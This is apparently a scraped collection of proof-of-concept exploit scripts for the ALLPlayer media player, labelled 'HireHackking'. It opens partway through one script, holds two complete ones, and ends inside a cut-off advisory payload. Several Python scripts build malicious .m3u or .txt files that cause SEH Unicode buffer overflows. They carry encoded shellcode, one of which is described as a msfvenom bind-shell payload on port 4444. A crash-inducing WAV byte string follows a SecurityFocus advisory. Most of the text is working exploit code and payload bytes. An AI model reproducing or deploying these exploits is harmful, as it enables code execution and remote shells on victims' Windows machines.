shellcode += "\x6c\x64\x51\x65\x58\x64\x72\x38\x72\x6b\x4f\x68\x4e"
shellcode += "\x44\x39\x71\x46\x73\x4f\x76\x52\x6b\x4c\x4c\x30\x4b"
shellcode += "\x34\x4b\x70\x58\x6d\x4c\x4d\x31\x58\x53\x64\x4b\x49"
shellcode += "\x74\x64\x4b\x6b\x51\x38\x50\x75\x39\x6e\x64\x4b\x74"
shellcode += "\x6e\x44\x31\x4b\x51\x4b\x6f\x71\x62\x39\x4f\x6a\x70"
shellcode += "\x51\x49\x6f\x47\x70\x31\x4f\x51\x4f\x31\x4a\x54\x4b"
shellcode += "\x6d\x42\x38\x6b\x34\x4d\x61\x4d\x30\x6a\x79\x71\x54"
shellcode += "\x4d\x74\x45\x77\x42\x79\x70\x4d\x30\x69\x70\x30\x50"
shellcode += "\x51\x58\x70\x31\x72\x6b\x42\x4f\x42\x67\x6b\x4f\x57"
shellcode += "\x65\x35\x6b\x68\x70\x47\x45\x34\x62\x4f\x66\x62\x48"
shellcode += "\x73\x76\x44\x55\x77\x4d\x43\x6d\x79\x6f\x6a\x35\x6d"
shellcode += "\x6c\x7a\x66\x31\x6c\x69\x7a\x73\x50\x4b\x4b\x4b\x30"
shellcode += "\x31\x65\x4a\x65\x57\x4b\x6d\x77\x4c\x53\x64\x32\x50"
shellcode += "\x6f\x71\x5a\x4b\x50\x51\x43\x6b\x4f\x49\x45\x50\x63"
shellcode += "\x31\x51\x50\x6c\x72\x43\x6e\x4e\x71\x55\x74\x38\x31"
shellcode += "\x55\x6b\x50\x41\x41"

buffer  = "http://"
buffer += "\x41" * 301
buffer += "\x61\x41"            # POPAD (NSEH)
buffer += "\x0f\x47"            # P/P/R (SEH)
buffer += "\x56\x41"            # PUSH ESI
buffer += "\x58\x41"            # POP EAX
buffer += "\x05\x07\x01\x41"    # ADD EAX, 0x1000700
buffer += "\x2d\x04\x01\x41"    # SUB EAX, 0x1000400
buffer += "\x50\x41"            # PUSH EAX
buffer += "\xc3"                # RET
buffer += "\x41" * 45
buffer += shellcode
buffer += "\x41" * (1500 - len(buffer))

f=open("player.m3u",'wb')
f.write(buffer)
f.close()
HireHackking 
#!/usr/bin/python -w

#
# Exploit Author: Chris Au
# Exploit Title:  AllPlayer V7.4 - Local Buffer Overflow (SEH Unicode)
# Date: 07-04-2019
# Vulnerable Software: AllPlayer V7.4
# Vendor Homepage: https://www.allplayer.org/
# Version: 7.4
# Software Link: http://allplayer.org/Download/ALLPlayerEN.exe
# Tested Windows Windows 7 SP1 x86
#
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open AllPlayer
# 3. select "Open video or audio file", click "Open URL"
# 4. paste contents from clipboard
# 5. select OK
# 6. calc.exe
#

filename="evil.txt"
header = "http://"
junk = "\xcc" * 301
nseh = "\x90\x45"
seh = "\x7a\x74" #pop pop retn
valign = (
"\x55" #push ebp
"\x45" #align
"\x58" #pop eax
"\x45" #align
"\x05\x20\x11" #add eax,11002000
"\x45" #align
"\x2d\x18\x11" #sub eax,11001900
"\x45" #align
"\x50" #push eax
"\x45" #align
"\xc3" #retn
)
#nop to shell
nop = "\xcc" * 115
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
"Lnc51hOuipAA")
fill = "\x45" * 5000
buffer = header + junk + nseh + seh + valign + nop + shellcode + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
HireHackking 
#!/usr/bin/python
# Exploit Title: ALL Player v7.4 SEH Buffer Overflow (Unicode)
# Version: 7.4
# Date: 15-08-2017
# Exploit Author: f3ci
# Tested on: Windows 7 SP1 x86

head = "http://"
seh = "\x0f\x47" #0x0047000f
nseh = "\x61\x41" #popad align
junk = "\x41" * 301
junk2 = "\x41" * 45

#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed
BufferRegister=EAX -f python
#x86/unicode_mixed succeeded with size 782 (iteration=0)
#Payload size: 782 bytes
buf = ""
buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"

#venetian
ven = "\x56"            #push esi
ven += "\x41"           #align
ven += "\x58"           #pop eax
ven += "\x41"           #align
ven += "\x05\x04\x01"   #add eax,01000400
ven += "\x41"           #align
ven += "\x2d\x01\x01"   #add eax,01000100
ven += "\x41"           #align
ven += "\x50"           #push eax
ven += "\x41"           #align
ven += "\xc3"           #ret

buffer = head + junk + nseh + seh + ven + junk2 + buf

print len(buffer)
f=open("C:\Users\Lab\Desktop\player.m3u",'wb')
f.write(buffer)
f.close()
HireHackking 
source: https://www.securityfocus.com/bid/67436/info

ALLPlayer is prone to a memory-corruption vulnerability.

An attacker can leverage this issue to crash the affected application, causing a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.

ALLPlayer 5.9 is vulnerable; other versions may also be affected. 

data
="\x52\x49\x46\x46\xE4\x0D\x0A\x09\x00\x57\x41\x56\x45\x66\x6D\x74\x20\x10\x00\x00\x00\x01\x00\x02\x00\x44\xAC\x00\x00\x10\xB1\x02\x00\x04\x00\x10\x00\x64\x61\x74\x61\xC0\x0D\x0A\x09\x00\x01\x00\x01\x00\x00\x00\x01\x00\x01\x00\x04\x00\x00\x00\x05\x00\x02\x00\x08\x00\x02\x00\x09\x00\x01\x00\x0D\x0A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\